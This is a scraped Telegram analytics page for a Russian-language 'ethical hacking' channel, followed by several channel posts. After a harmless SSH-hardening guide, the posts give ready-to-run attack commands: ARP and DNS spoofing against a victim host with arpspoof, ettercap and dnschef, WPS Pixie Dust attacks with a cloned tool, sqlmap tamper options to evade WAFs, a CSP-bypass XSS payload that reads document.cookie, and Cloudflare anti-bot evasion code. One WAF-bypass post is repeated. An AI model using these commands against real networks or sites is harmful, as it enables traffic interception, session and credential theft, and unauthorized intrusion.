CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Показати більше📈 Аналітичний огляд Telegram-каналу CodeGuard: CyberSec Edition
Канал CodeGuard: CyberSec Edition є активним учасником. На даний момент спільнота об'єднує 12 558 підписників, посідаючи 10 114 місце в категорії Технології та додатки та 52 575 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 12 558 підписників.
За останніми даними від 21 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 516, а за останні 24 години на 12, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 12.27%. Протягом перших 24 годин після публікації контент зазвичай збирає 6.72% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 1 539 переглядів. Протягом першої доби публікація в середньому набирає 843 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 4.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як codeguard, pysec, docker, grep, контейнер.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Завдяки високій частоті оновлень (останні дані отримано 22 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"
Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования.
Копируем публичный ключ на сервер:
ssh-copy-id user@server
🖥 2. Настройка SSH клиента для удобства и безопасности
Правим файл ~/.ssh/config:
Host myserver
HostName server.example.com
User user
Port 2222
IdentityFile ~/.ssh/id_ed25519
IdentitiesOnly yes
Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й.
⚙️ 3. Отключение паролей для повышения безопасности
На сервере редактируем /etc/ssh/sshd_config:
PasswordAuthentication no PermitRootLogin no PubkeyAuthentication yes Port 2222Делаем резервную копию файла перед изменением и перезапускаем SSH:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd
🐳 4. Использование шифров и алгоритмов
Для контроля алгоритмов добавим в ~/.ssh/config:
Host myserver
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
KexAlgorithms curve25519-sha256
Ограничение по криптографии улучшает защиту от устаревших и слабых методов.
📌 5. Включение двухфакторной аутентификации (2FA)
Устанавливаем Google Authenticator на сервер:
sudo apt install libpam-google-authenticator
google-authenticator
Добавляем в /etc/pam.d/sshd строку:
auth required pam_google_authenticator.soИ в sshd_config:
ChallengeResponseAuthentication yes AuthenticationMethods publickey,keyboard-interactiveПерезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps
📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest
Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource
sudo apt install dsniff
# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1
# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt
Содержимое hosts.txt:
example.com 1.2.3.4🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:
sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof
- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS.
🛜 dnschef — DNS-прокси для легкой подмены:
sudo apt install python3-pip
pip3 install dnschef
sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com
Всё, что запросит example.com — получит 5.6.7.8.
⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat
🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat
🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей📥 Установка (пример для Kali Linux):
apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator
🚀 Примеры запуска:
— Ручная атака на конкретные цели:
penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11
— Сканирование и атака всех точек на канале 1:
penetrator -i wlan0 -c 1
— Атака всех доступных точек с WPS с использованием Pixie Dust:
penetrator -i wlan0 -A
— Последовательная атака поочерёдно всех точек с WPS:
penetrator -i wlan0 -A -M
⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение
📂 Репозиторий на GitHub
😈 CodeGuard | Chat👩💻 Весь курс разбит на ежедневные задачи с ресурсами и материалами. Темы охватывают: — Network+ (основы сетей) — Security+ (принципы безопасности) — Linux (основы и командная строка) — Python (для задач безопасности) — Анализ сетевого трафика — Git (контроль версий) — ELK (логирование и аналитика) — Облачные платформы: GCP, AWS, Azure — Хакинг (этичный и практический) — Составление резюме и поиск работыЭто структурированный и удобный план для любого уровня, помогающий системно осваивать ключевые навыки ИБ. 📱 План обучения 😈 CodeGuard | Chat
sqlmap -u "https://example.com/product?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3
- space2comment заменяет пробелы на комментарии SQL, запутывая фильтры
- chardoubleencode — двойное кодирование символов
- between — альтернативные выражения для операторов
Это помогает преодолеть базовую фильтрацию WAF.
⚡️ Шаг 2. Обход CSP (Content Security Policy) с помощью JSONP и Mutation XSS
Пример обхода через JSONP:
<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>
Mutation XSS позволяет выполнять полезный скрипт, несмотря на строгую CSP благодаря манипуляциям с DOM.
⚡️ Шаг 3. Обход Cloudflare и антиботов с помощью SeleniumBase и undetected-chromedriver
Python пример:
from seleniumbase import Driver
driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()
Используйте undetected-chromedriver, чтобы браузер маскировался под обычного пользователя и проходил защиту Cloudflare.
⚡️ Шаг 4. Кастомные payloadы с AI и Mutation XSS для обхода современных WAF
Генерируйте "шумовые" запросы, частично похожие на легитимные, чтобы запутать эвристику фильтров.
📂 Подробнее: probtoplay.com, codeby.net и еще статья на codeby.net
😈 CodeGuard | Chatsqlmap -u "https://example.com/page?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3
- space2comment меняет пробелы в запросах на SQL-комментарии, запутывая фильтры
- Позволяет обойти стандартные фильтры WAF и выполнить SQL-инъекции
🟫 Шаг 2. Обход CSP и XSS-защиты через Mutation XSS и JSONP
<script src="https://trusted.cdn.com/api?callback=alert(document.cookie)//"></script>
- Используется JSONP-запрос, разрешённый политиками CSP, для выполнения скриптов
- Mutation XSS позволяет модифицировать DOM, обходя CSP
🐳 Шаг 3. Обход Cloudflare и антиботов с Selenium и undetected-chromedriver
Пример на Python:
from seleniumbase import Driver
driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()
- Маскирует браузер, позволяя проходить сложные антибот-механизмы
⚡️ Шаг 4. Кастомные AI-сгенерированные payloadы и шумовые HTTP-запросы
- Генерация запросов, частично похожих на легитимные, для обмана эвристики WAF
- Использование Mutation XSS с динамическими изменениями содержимого
📚 Для самых жестких: — Ru-brightdata.com — Codeby.netЭти методы помогут провести полный, незаметный аудит веб-безопасности и выявить скрытые уязвимости 😈 CodeGuard | Chat
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
